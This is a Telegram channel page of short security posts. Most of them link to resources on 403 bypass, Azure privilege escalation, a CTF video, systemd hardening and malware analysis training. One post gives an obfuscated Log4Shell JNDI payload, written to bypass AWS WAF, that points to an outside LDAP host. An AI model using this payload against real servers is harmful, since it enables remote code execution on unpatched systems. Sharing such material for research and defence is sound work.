Security Analysis – Telegram
Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
⭕️ سلام JNDI هستم :|
#fun #log4j #jndi
@securation
⭕️ Previous AWS WAF bypass is patched.. here is another:

${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o}

#jndi #log4j #exploit #bypass
@securation
⭕️ مجموعه ای از wordlists و دستوراتی برای FFUF و template هایی برای nuclei که در بایپس ارور های 403 بکار برده میشه رو اینجا میتونید استفاده کنید.

https://github.com/aufzayed/bugbounty/tree/main/403-bypass
#bugbounty #cybersecurity #infosec #wordlists #403bypass #hack #ffuf #fuzzing #web
@securation
👍1
⭕️ Log4j mindmap

#log4j #infosec
@securation
⭕️Azure Privilege Escalation via Azure API Permissions Abuse

How Azure API Permissions can be abused to escalate to Global Admin.

https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48

#azure #cloud #privsec
@securation
In this video I would like to showcase another challenge from Snyk capture the flag event that was going on from October 5th to October 7th of 2021. My video showcase #premieres at 9:00 PM IRST (12 PM EST)

https://youtu.be/xCdqK84bngg
⭕️ نسخه جدید systemd منتشر شد.

تغییرات خیلی خوبی در زمینه امنیت داشته پشتیبانی از credentialهای رمزنگاری شده و authenticated .
هماهنگی بیشتر با پارتیشن های رمز شده و پشتیبانی از TPM2/FIDO2/PKCS11 .
استفاده از libgcrypt به جای OpenSSL .
امکان محدود سازی Network Interface ها و محدود کردن FileSystems سرویس ها با BPF LSM

توضیحات بیشتر رو اینجا بخونید :
https://github.com/systemd/systemd/releases/tag/v250
#systemd #security #hardening
@securation
⭕️Python Penetration Testing Cheatsheet

#CheatSheet #python #programmer
@securation
2
⭕️Introduction to Malware Analysis and Reverse Engineering

https://class.malware.re

Well-organized entry-level content for Static Analysis of Java applications, Malware Analysis and Reverse Engineering.

#cybersecurity #malware #android #bugbounty
@securation
Log4j for ICS systems :)
👍1👎1